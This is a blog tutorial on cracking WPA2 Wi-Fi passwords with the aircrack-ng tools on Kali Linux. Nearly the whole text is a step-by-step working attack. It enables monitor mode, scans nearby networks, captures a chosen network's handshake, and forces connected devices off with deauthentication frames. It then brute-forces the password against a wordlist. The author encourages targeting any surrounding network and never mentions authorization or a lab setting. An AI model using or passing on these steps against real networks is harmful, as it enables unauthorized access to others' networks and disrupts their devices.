Published Mar 11, 2021 by Logan O'Connell
This guide to hacking WPA2 networks assumes that you have an installation of Kali Linux running, either in a VM or on bare metal, or you have the aircrack-ng suite built on your computer, perhaps through Homebrew.
This guide will unfortunately not have images, although I may update them later with images, as I am currently without my external Wi-Fi card.
Oh! That reminds me. Make sure if you are going through this tutorial that you have an external Wi-Fi card or a built in Wi-Fi chip that allows for monitor mode. This is crucial in getting these commands to work correctly.
Alright, let’s get started.
In your terminal, type:
airmon-ng
This will yield a small table that shows the interface of your external Wi-Fi card, which should be something along the lines of wlan0
or wlan0mon
.
In your terminal, type:
airmon-ng start [interface name]
This will set the card to monitor mode. Here comes the fun stuff.
In your terminal, type:
airodump-ng [interface name]
This will bring up an updating table, which wall show all the SSIDs of surrounding Wi-Fi networks.
Once you seen the Wi-Fi network you would like to target, feel free to CTRL + C
out of there. Copy the BSSID and channel number (referred to by “CH”) of the Wi-Fi network you would like to target, and move to the next step.
In your terminal, type:
airodump-ng -c [channel number] --bssid [BSSID] -w /root/Desktop [interface name]
This will begin sniffing for handshakes between the Wi-Fi network and a device looking to connect to it. An updating table will pop up, and once a “WPA handshake” column appears, the handshake has been captured and the .pcap file containing the data has been saved to /root/Desktop
.
Sometimes it can take a while for a handshake to appear, especially if its a smaller network and devices are not joining too frequently. To combat this, we can attempt to deauth devices on the network already and force them to reinitiate a handshake. When “STATION”s begin to populate the table from the last section’s command, we can run the code below to attempt to deauth the device.
In your terminal, type:
aireplay-ng -0 2 -a [BSSID] -c [STATION] [interface name]
Now that we have the .pcap file, we have the handshake ready to be cracked. From here, download a wordlist or use one of the one’s built into Kali Linux already. Here is one specifically meant for WPA2 networks.
Then, type the following in your terminal to begin cracking the .pcap file:
aircrack-ng -a2 -b [BSSID] -w [path to wordlist] [path to .pcap file]
If the correct password is found, you should see a “KEY FOUND!” prompt in the middle of the terminal window. If it fails, keep trying other wordlists.
That’s all!